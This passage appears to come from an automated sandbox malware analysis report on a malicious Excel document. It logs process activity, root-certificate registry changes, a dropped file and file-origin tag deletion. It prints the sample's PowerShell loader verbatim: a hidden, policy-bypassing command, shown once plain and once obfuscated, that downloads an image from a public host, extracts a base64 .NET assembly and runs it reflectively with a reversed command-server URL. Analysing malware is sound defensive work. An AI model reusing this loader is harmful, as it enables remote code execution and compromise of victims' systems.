            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: webio.dll
            Source: C:\Windows\explorer.exeSection loaded: explorerframe.dll
            Source: C:\Windows\explorer.exeSection loaded: duser.dll
            Source: C:\Windows\explorer.exeSection loaded: dui70.dll
            Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
            Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
            Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
            Source: C:\Windows\explorer.exeSection loaded: slc.dll
            Source: C:\Windows\explorer.exeSection loaded: secur32.dll
            Source: C:\Windows\explorer.exeSection loaded: propsys.dll
            Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
            Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
            Source: C:\Windows\explorer.exeSection loaded: webio.dll
            Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
            Source: Binary string: F:\System.Management.Automation Controle Financeiro Rump fix\obj\Debug\net20\System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.494209525.0000000009260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.461385343.0000000003D19000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: RegAsm.pdb source: rugtucw, 00000010.00000000.513756817.0000000000E72000.00000020.00000001.01000000.00000009.sdmp, rugtucw.14.dr
            Source: Binary string: RegAsm.pdb4 source: rugtucw, 00000010.00000000.513756817.0000000000E72000.00000020.00000001.01000000.00000009.sdmp, rugtucw.14.dr
            Source: Binary string: F:\System.Management.Automation Controle Financeiro Rump fix\obj\Debug\net20\System.Management.Automation.pdbSHA256 source: powershell.exe, 0000000C.00000002.494209525.0000000009260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.461385343.0000000003D19000.00000004.00000800.00020000.00000000.sdmp
            Source: 6B430000.1.drInitial sample: OLE indicators vbamacros = False
            Source: #20240627_Edlen_B.xlsInitial sample: OLE indicators encrypted = True

            Data Obfuscation

            barindex
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhD
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GBR/0808/651.771.64.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GBR/0808/651.771.64.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }"Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_000E9247 LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,18_2_000E9247
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_0092CB90 pushfd ; retf 8_2_0092CB91
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_0092CBE8 pushad ; iretd 8_2_0092CBE9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_01CA0E8F push cs; retf 0001h12_2_01CA0E9E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_01CA1E15 push ds; retf 0001h12_2_01CA1E16
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040134A pushfd ; retf 13_2_00401353
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004012F2 pushfd ; retf 13_2_004012F3
            Source: C:\Windows\explorer.exeCode function: 19_2_00061405 push esi; ret 19_2_00061407
            Source: C:\Windows\explorer.exeCode function: 19_2_000647A7 push esp; iretd 19_2_000647A8
            Source: C:\Windows\explorer.exeCode function: 19_2_000614D4 push esi; ret 19_2_000614D6
            Source: C:\Windows\explorer.exeCode function: 19_2_0006A055 push es; iretd 19_2_0006A05D
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_000838A7 push esp; iretd 20_2_000838A8
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_0008967E push ds; retf 20_2_00089680
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_000894E6 push edx; ret 20_2_000894E7
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_000887CE push es; ret 22_2_00088A18
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_00088EEF push edi; ret 22_2_00088EF0
            Source: C:\Windows\explorer.exeCode function: 23_2_00061405 push esi; ret 23_2_00061407
            Source: C:\Windows\explorer.exeCode function: 23_2_000614D4 push esi; ret 23_2_000614D6
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_00083417 push esp; iretd 24_2_00083418
            Source: C:\Windows\explorer.exeCode function: 28_2_00061405 push esi; ret 28_2_00061407
            Source: C:\Windows\explorer.exeCode function: 28_2_000645A7 push esp; iretd 28_2_000645A8
            Source: C:\Windows\explorer.exeCode function: 28_2_000614D4 push esi; ret 28_2_000614D6
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 29_2_00083627 push esp; iretd 29_2_00083628
            Source: C:\Windows\explorer.exeCode function: 30_2_00061405 push esi; ret 30_2_00061407
            Source: C:\Windows\explorer.exeCode function: 30_2_000614D4 push esi; ret 30_2_000614D6
            Source: C:\Windows\explorer.exeCode function: 30_2_0006AC8D push esp; iretd 30_2_0006AC95
            Source: C:\Windows\explorer.exeCode function: 30_2_0006AAD2 push ebp; iretd 30_2_0006AAD3

            Persistence and Installation Behavior

            barindex
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\z2.ink\DavWWWRootJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\z2.ink\DavWWWRootJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXESection loaded: netapi32.dll and davhlpr.dll loadedJump to behavior
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\rugtucwJump to dropped file
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\rugtucwJump to dropped file

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\rugtucw:Zone.Identifier read attributes | deleteJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_00083862 GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep,22_2_00083862
            Source: C:\Windows\SysWOW64\wscript.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
